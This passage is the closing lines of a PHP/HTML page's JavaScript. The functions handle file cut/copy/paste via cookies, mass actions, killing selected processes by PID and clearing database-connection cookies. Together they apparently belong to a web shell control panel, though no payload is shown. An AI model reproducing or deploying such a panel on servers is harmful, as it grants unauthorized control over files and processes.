3115. if(a[i].checked) c.className = 'cbox_selected';
3116. else c.className = '';
3117.  
3118. }
3119. }
3120. function hilite(el){
3121. var c = el.parentElement.parentElement;
3122. if(el.checked) c.className = 'cbox_selected';
3123. else c.className = '';
3124. }
3125. function massactgo(){
3126. var a = d.getElementsByName('cbox');
3127. var b = d.getElementById('massact');
3128. var c = d.getElementsByName('abox');
3129. var buffer = '';
3130.  
3131. if(b.value=='cut' || b.value=='copy'){
3132. d.cookie='massact='+b.value+';';
3133. for(var i=0;i<a.length;i++) if(a[i].checked) buffer += a[i].value+'|';
3134. d.cookie='buffer='+escape(buffer);
3135. }
3136. else if(b.value=='paste'){
3137. addinput(b.form,'y','paste');
3138. b.form.submit();
3139. }
3140. else{
3141. for(var i=0;i<a.length;i++) if(a[i].checked) buffer += a[i].value+'|';
3142. d.cookie='buffer='+escape(buffer);
3143. addinput(b.form,'y', b.value);
3144. b.form.submit();
3145. }
3146. for(var i=0;i<a.length;i++){
3147. a[i].checked = false;
3148. a[i].parentElement.parentElement.className='';
3149. }
3150. c[0].checked = false;
3151. }
3152. function pkill(){
3153. var a = d.getElementsByName('cbox');
3154. var c = d.getElementsByName('abox');
3155. var buffer = '';
3156.  
3157. for(var i=0;i<a.length;i++) if(a[i].checked) buffer += a[i].value+'|';
3158.  
3159. if(buffer!=''){
3160. addinput(c[0].form,'x', 'ps');
3161. addinput(c[0].form,'pid', buffer);
3162. c[0].form.submit();
3163. }
3164.  
3165. for(var i=0;i<a.length;i++){
3166. a[i].checked = false;
3167. a[i].parentElement.parentElement.className='';
3168. }
3169. c[0].checked = false;
3170. }
3171. function dc(id){
3172. document.cookie = dbcon[id] + '=; expires=Thu, 01 Jan 1970 00:00:01 GMT;';
3173. }
3174. </script>
3175. </body>
3176. </html><?php die(); ?>